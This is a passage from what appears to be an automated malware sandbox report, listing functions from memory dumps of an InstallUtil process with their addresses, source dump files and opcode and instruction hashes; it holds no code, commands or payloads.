                                                        • Opcode Fuzzy Hash: 4b26bb3a2cc76f3476b8ea7c3d92516d5e8f0c0c2c46ce4bbf002f97c80fefda
                                                        • Instruction Fuzzy Hash: 3D316931C0131ADFEB01AFB1D45C7AEBBB1EB4A312F04885AD0016A2A5CB780A48CF51
                                                        Function 012776E8 Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce691ec91a7e165f3fc4e5937d68b964307ac06a0c8e0179f6772696af2f6c5d
                                                        • Instruction ID: 82adc0081e36d023b278d27e9cbf0a060bff773f2e1822dbbc34caa7e8552e7d
                                                        • Opcode Fuzzy Hash: ce691ec91a7e165f3fc4e5937d68b964307ac06a0c8e0179f6772696af2f6c5d
                                                        • Instruction Fuzzy Hash: 1A21F5347201024BDB2A263DC5DE67FFB9BAFD4655B644039D602CB3A6EE79CC429780
                                                        Function 012776F8 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b09687c491ab2fadb9433882c30eb26d4d863113320fe45a93dad2b39f352113
                                                        • Instruction ID: aafb98a920b21756da3e6f7c04ddf3e82484ca76bead4dd9258d6af2aab4b52d
                                                        • Opcode Fuzzy Hash: b09687c491ab2fadb9433882c30eb26d4d863113320fe45a93dad2b39f352113
                                                        • Instruction Fuzzy Hash: 3721D7343241024BEB2A662DC49D67FB69BAFC4755F644038D606CF3AAEE75CC429780
                                                        Function 0127A819 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4a911d152f50e8062f8d7622c90d1442b45e6e113f1e3568a550eaf14f7d1a8c
                                                        • Instruction ID: e50a9e4ad561bebb56e03628004ad7764ebf03c2d6d4c7a1ad669441237bf16a
                                                        • Opcode Fuzzy Hash: 4a911d152f50e8062f8d7622c90d1442b45e6e113f1e3568a550eaf14f7d1a8c
                                                        • Instruction Fuzzy Hash: 5C317A75E005058FCB04CF69C888AAFBBB7BF88720B198559E655973A1CB349D12CB90
                                                        Function 01272060 Relevance: .1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cabf6bc858276c3ef8cd090e46ec7397e41d1b75dd47670fec24b8a1f5d9c55a
                                                        • Instruction ID: 58ec4ffee95d872cda07b1878b5c6a60efdc524ac9ae273b0d578b44d208bd0f
                                                        • Opcode Fuzzy Hash: cabf6bc858276c3ef8cd090e46ec7397e41d1b75dd47670fec24b8a1f5d9c55a
                                                        • Instruction Fuzzy Hash: D321E275A00206EFCF19DB24D4409AF77B6EB9C260B10C859EA098B384DA31EA42CBD1
                                                        Function 01275A68 Relevance: .1, Instructions: 76COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01da58299d3ec0f23c23cdc4b7514a4e96676e9359c9e5eee3b65b015c9ac56b
                                                        • Instruction ID: a0da3fc5440bd0dfa8779929871fc29a38e0c2cec269e3c6f1b51c9c5334d7c9
                                                        • Opcode Fuzzy Hash: 01da58299d3ec0f23c23cdc4b7514a4e96676e9359c9e5eee3b65b015c9ac56b
                                                        • Instruction Fuzzy Hash: BE2107317117129FD72AAA28C8D493BF762FF84650B054579EA06CB399DF30DC028BC0
                                                        Function 00F8D4F0 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482031689.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_f8d000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6f6e7701ddff8a8c5677a4d1a8f2d1ef0de392c96529941af0ac24bd6c7fa975
                                                        • Instruction ID: 7da418c10bae9cc90c9449649af91e25380737424d471292585231f21733a3ca
                                                        • Opcode Fuzzy Hash: 6f6e7701ddff8a8c5677a4d1a8f2d1ef0de392c96529941af0ac24bd6c7fa975
                                                        • Instruction Fuzzy Hash: 2D2108B2504200DFDB15EF14D5C0F66BF65FF94328F28856AE9050E296C336D855EBA1
                                                        Function 00F8D404 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482031689.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_f8d000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ba5fd73b864f60376c8398c8df8b3aec7d1e802acbc879d9a32021132744c7b
                                                        • Instruction ID: c3cbbca2043b561b518af7c32b059b7da58764ab6fe8e9324c4c89e522768491
                                                        • Opcode Fuzzy Hash: 4ba5fd73b864f60376c8398c8df8b3aec7d1e802acbc879d9a32021132744c7b
                                                        • Instruction Fuzzy Hash: 272133B2504200EFCB04EF14C8C0F66BF65FF94324F20C569E9090B296C336E806EBA1
                                                        Function 00F9D044 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482139150.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_f9d000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 35ea2d98ed3356e834d8655c4e97e646c88a965c3d7c44a6491b7aae8e9140f6
                                                        • Instruction ID: 77f3e20e5edc8f479de0d5715faa7a8d043216fd1c034656ccf303c552b822a0
                                                        • Opcode Fuzzy Hash: 35ea2d98ed3356e834d8655c4e97e646c88a965c3d7c44a6491b7aae8e9140f6
                                                        • Instruction Fuzzy Hash: 922107B6504204DFEF14CF24C9C0B26BB65FB84324F34C96DE9494B265C736D846EA61
                                                        Function 012739ED Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb8c358c1f0820266be918e8f398a5e052aaffb482febf5d3301b0948d45b172
                                                        • Instruction ID: cb70975f961df5363570b266a9c421b10f88abda94aab98f9787d9956bdc626d
                                                        • Opcode Fuzzy Hash: bb8c358c1f0820266be918e8f398a5e052aaffb482febf5d3301b0948d45b172
                                                        • Instruction Fuzzy Hash: AD31A579E51309DFCB48EFA8E59489DBBB2FF49311B20546AE809AB325D731AD05CF40
                                                        Function 066196F0 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a215efb233942423e49e12e31b2b29e8c6dd6528a062bf8e8acca2b272c5714
                                                        • Instruction ID: 7afaf20b0b259dac6b5f0fc2ed4a076e5a490cb9abf7eccd77cf54e550ac9681
                                                        • Opcode Fuzzy Hash: 9a215efb233942423e49e12e31b2b29e8c6dd6528a062bf8e8acca2b272c5714
                                                        • Instruction Fuzzy Hash: EB112B367082641FCF4A6E789C646EE3EA3EFC4350B04486AE905DB382DF388D0293D5
                                                        Function 0127215C Relevance: .1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 712d28e2a9374314b0e6b2f9ec410802f85701c8681e91d58c00934176a59f5d
                                                        • Instruction ID: db6511d5ee122d1fff86e024870848f712e903ad269108e28dd4cfb887a77452
                                                        • Opcode Fuzzy Hash: 712d28e2a9374314b0e6b2f9ec410802f85701c8681e91d58c00934176a59f5d
                                                        • Instruction Fuzzy Hash: 3D115E76E142499FCF019BF8AC109DEBF30FF89320B158796D62677151EA311946C751
                                                        Function 01274DC1 Relevance: .1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e83ec91c0d834f7cbd1600fd4ce33c33598d79507dcb48e2027d6f17ec57418b
                                                        • Instruction ID: aec023e5a4f504c2bc9095b254c76c8478d1f823253886088b46a30501a73e19
                                                        • Opcode Fuzzy Hash: e83ec91c0d834f7cbd1600fd4ce33c33598d79507dcb48e2027d6f17ec57418b
                                                        • Instruction Fuzzy Hash: 7321F6727481459FDB16AF28D8847AB7FA2FF84310F104868F6058B396CB38CD52DB91
                                                        Function 0661E0C0 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8244778947a020a34198bec8bbf013b26b58018e225475a39acde1381193e07c
                                                        • Instruction ID: 54eb1ad24eb661a43a9c3579fb5bea43a2742b1e6a6e7cdfe689958742b98922
                                                        • Opcode Fuzzy Hash: 8244778947a020a34198bec8bbf013b26b58018e225475a39acde1381193e07c
                                                        • Instruction Fuzzy Hash: 3B1108317042448FD7054B799C98AABBBABAFCA350B184477E646C7386DE258D0787B0
                                                        Function 01271EF8 Relevance: .1, Instructions: 60COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce59c25cd04c3d4d25f876756920a38596bc6c2db434cdd923a0c4e34a8047e1
                                                        • Instruction ID: ed0c8aee6dc8e9b39afd6da2e559f5d2dc5e323e6327877ffb61078c6949cf4c
                                                        • Opcode Fuzzy Hash: ce59c25cd04c3d4d25f876756920a38596bc6c2db434cdd923a0c4e34a8047e1
                                                        • Instruction Fuzzy Hash: 2B2113B4C1960A8FCB41EFA8D8954EEBFF0FF19300F1051AAD905B7264EB305A55CBA1
                                                        Function 0127E208 Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3081bda18f1f674b1b5afa7bcf2535a43612b27cc1f4bbd3a3fdc9e89652c63
                                                        • Instruction ID: 372d1e44e3e43eb96afa338c03330161e5832e3e047bfcaa1972c232021a0ba5
                                                        • Opcode Fuzzy Hash: b3081bda18f1f674b1b5afa7bcf2535a43612b27cc1f4bbd3a3fdc9e89652c63
                                                        • Instruction Fuzzy Hash: AC2160B1E001099FDB45EFB8D98169EBFF1FB55304F0095AAD004AB365EB705A46DB81
                                                        Function 0127D61F Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 957b03ec71b7cee7f5f0df4b3d16cab09408bb23444fb0faad33bdd516af5116
                                                        • Instruction ID: 2593dd000032d52608ae8fe42ae8231ec301aba2912b873c7e00245c923291b7
                                                        • Opcode Fuzzy Hash: 957b03ec71b7cee7f5f0df4b3d16cab09408bb23444fb0faad33bdd516af5116
                                                        • Instruction Fuzzy Hash: 9B117970D102488BDB09CFEAD4446DEFBB2AFC9300F08D169D418B72AAD77084428F14
                                                        Function 01275A78 Relevance: .1, Instructions: 59COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ab6cb755adeade9f19c35eb78fde73bd6176a738c73849add8cb6a42b7528826
                                                        • Instruction ID: 449aa2eadc51aa533e86d573ee5778753192011ce724a62da1a8da090adc6e94
                                                        • Opcode Fuzzy Hash: ab6cb755adeade9f19c35eb78fde73bd6176a738c73849add8cb6a42b7528826
                                                        • Instruction Fuzzy Hash: 7411E5317117129FD72AAA29D8D893BF7A6BF846503054479EA06CB354DF30DC028BD0
                                                        Function 01271F61 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3d77001a06ba4db7cbfb22bdee2c00ed95aa9dc5745d5746be522aa6e4b85a14
                                                        • Instruction ID: 9d80785a536a9fb074e5ad0515dc8d2eb5fe1c47c9d39b4a57f057ed87c4a815
                                                        • Opcode Fuzzy Hash: 3d77001a06ba4db7cbfb22bdee2c00ed95aa9dc5745d5746be522aa6e4b85a14
                                                        • Instruction Fuzzy Hash: B121F2B4C016498FCB01EFA8D8954EEBFF0BF19300F10516AD905B3214EB305A95CBA1
                                                        Function 00F8D3FF Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482031689.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_f8d000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                        • Instruction ID: 03332a1a35a1f4d91f134f575db40ef47c7dac71e640849a3ccbd157bf449a84
                                                        • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                        • Instruction Fuzzy Hash: D6110372804280CFCB16DF00D5C4B56BF72FF94324F24C1A9D8094B656C33AE85ADBA1
                                                        Function 00F8D4EB Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482031689.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_f8d000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                        • Instruction ID: d5b398c0684d802eacb19dd46aff5c404b6c7ab920957ea7eba834be0c8d904f
                                                        • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                        • Instruction Fuzzy Hash: 2311DF76804240CFCB16DF00D5C4B56BF62FF94328F2885AAD8090B256C33AD85ADBA1
                                                        Function 06612670 Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24eeb8217e151744ea8e934a609dc84f21ccdc6d90908a8e4afe23dd3bf494a6
                                                        • Instruction ID: a9515a98b03d70cb59de44dd4e47c94e962e89ce861c404c20e301843ec47a1d
                                                        • Opcode Fuzzy Hash: 24eeb8217e151744ea8e934a609dc84f21ccdc6d90908a8e4afe23dd3bf494a6
                                                        • Instruction Fuzzy Hash: 5911A175B002118FC7949B79E548A5E3BF8EF8975170004A6E405DB326EB32DD168BE0
                                                        Function 06619328 Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 00b32e96966c5cf02c02ae139c44a8f4dfc542a591ac81e12efc5c77a0818df1
                                                        • Instruction ID: 73e4ada6fe4091cf07ea0803dc7b113ed225f0e2880b7633440b1dfc5d1951d3
                                                        • Opcode Fuzzy Hash: 00b32e96966c5cf02c02ae139c44a8f4dfc542a591ac81e12efc5c77a0818df1
                                                        • Instruction Fuzzy Hash: 181137B6800249DFDB10CF99C945BDEBFF5EF48320F14841AE914A7211C379A554DFA5
                                                        Function 06619999 Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 91cde571048eb61ab7dec273f8836cef76a3ae48a07ff230b7777d063d08750b
                                                        • Instruction ID: 9a9559906b31d87bcecb1748dbc20e592a624831a5ecaada09fcace4097edc01
                                                        • Opcode Fuzzy Hash: 91cde571048eb61ab7dec273f8836cef76a3ae48a07ff230b7777d063d08750b
                                                        • Instruction Fuzzy Hash: A61137B6800249DFCB10CF99D945BDEBFF5EF48320F28841AE914A7610C379A554DFA5
                                                        Function 0127E218 Relevance: .1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 365fd812b6ba252741c0532e3b4d9426a7fde069d20b320a09fed27e307e2149
                                                        • Instruction ID: e8d2d66207357acfebc0eef282a121919cf5c6f4c84281554e6e4d53a6a694f6
                                                        • Opcode Fuzzy Hash: 365fd812b6ba252741c0532e3b4d9426a7fde069d20b320a09fed27e307e2149
                                                        • Instruction Fuzzy Hash: 7E115EB5E0020D9FDB44EFB8D980A9EBFF1FB44304F00D5AAD014AB364EB305A469B81
                                                        Function 06618EC1 Relevance: .1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 172c6fa2924826b4f3f0a25c069ab0c4c29516d294ef02be4bd6ee26c9273675
                                                        • Instruction ID: bd08471000113b4f84a55a6c70cb4b790c8064cea810ab565c1647c3fc6849f9
                                                        • Opcode Fuzzy Hash: 172c6fa2924826b4f3f0a25c069ab0c4c29516d294ef02be4bd6ee26c9273675
                                                        • Instruction Fuzzy Hash: FB110074F001498FDF00DFE8D950BDEBBB2EB88315F049055E918AB345E730DA828B51
                                                        Function 00F9D03F Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482139150.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_f9d000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                        • Instruction ID: de29612aef2050641951c0bb1b32d67cea155eb7c174233e0812ea2b0d22c15c
                                                        • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                        • Instruction Fuzzy Hash: 5B11D075904244CFEB11CF14C5C4B15BF62FB44324F34C6A9D8494B666C33AD84ADF61
                                                        Function 0127560F Relevance: .0, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01d753ed78e17d6c2112230fc8ce25f395d33733d5099554995d8d70860dbd06
                                                        • Instruction ID: c21c191feaccdd66a2275f660417e718bf2a8b534ff6cd629675ada725ad26a4
                                                        • Opcode Fuzzy Hash: 01d753ed78e17d6c2112230fc8ce25f395d33733d5099554995d8d70860dbd06
                                                        • Instruction Fuzzy Hash: F001D872B002156FDB029E589C54AEF7FE7DFC8751F18846AF604C72A4CA7589129B90
                                                        Function 066125E8 Relevance: .0, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 184015f05770dc8c8efdd7aa1e7a161f1eda813febd244bab43af7dcd8e53ae8
                                                        • Instruction ID: 3facd0065dcd86c4542610e0682f651c6f531f36d5eeecbc1b87577ffd0f4cb0
                                                        • Opcode Fuzzy Hash: 184015f05770dc8c8efdd7aa1e7a161f1eda813febd244bab43af7dcd8e53ae8
                                                        • Instruction Fuzzy Hash: B801B671E00219DFCF44EFBAC9556AEBBF5AF48200F14856AD419E7254E7345A11CBD0
                                                        Function 06619760 Relevance: .0, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4bddeb7faa1bf753c23dfb23a9dfb2ff7c832bc31c0ddd9cf7b4b13031d1278
                                                        • Instruction ID: 1ddff38812a09b4b60ecf37fee08f3d23231332b0b5943176882851f44e2f795
                                                        • Opcode Fuzzy Hash: a4bddeb7faa1bf753c23dfb23a9dfb2ff7c832bc31c0ddd9cf7b4b13031d1278
                                                        • Instruction Fuzzy Hash: 42F054363002186BCF065E989C509EF7AABEBC8260B40442AFA0997251DF318D1167A5
                                                        Function 0127DF18 Relevance: .0, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e001a77882449383e17bda3ea4ab7e9ca8a69f0f3b85636e79cc7d99e2867e2e
                                                        • Instruction ID: becf84b901289f39b86a4de2c12ac96cf9f263c01fca771b38278a43f98056a6
                                                        • Opcode Fuzzy Hash: e001a77882449383e17bda3ea4ab7e9ca8a69f0f3b85636e79cc7d99e2867e2e
                                                        • Instruction Fuzzy Hash: AEE02B71D181099FCB048FB9A8155FA7BB5ABDA310F405465D500A71A1D7F5D5068B81
                                                        Function 0127D459 Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8757e14bb9ab072e26e2d8a8db8fbc0c7b7a170429f9d760c43668efdc7bf8b
                                                        • Instruction ID: 862005d2f7c4235b0f4b24048a6855135d693b2b696bc046f92f68c83671a203
                                                        • Opcode Fuzzy Hash: e8757e14bb9ab072e26e2d8a8db8fbc0c7b7a170429f9d760c43668efdc7bf8b
                                                        • Instruction Fuzzy Hash: 36E02B75D0814C9BCB029BA9E81A5FEBB719B9A300F005065D104E32A1D7B498068B40
                                                        Function 01272010 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e9429f0722e4aba23c0aa0c0f074d548a0e6e58c367097d65010b2dbb64030e9
                                                        • Instruction ID: f7c9f95731964d04f917e017a751c9aadd29127d7e010704acab73eea3226499
                                                        • Opcode Fuzzy Hash: e9429f0722e4aba23c0aa0c0f074d548a0e6e58c367097d65010b2dbb64030e9
                                                        • Instruction Fuzzy Hash: 27E0D871C1036A97CB1196A59C114DFBB34ED93310B5195A7D1203B141E76025098BF1
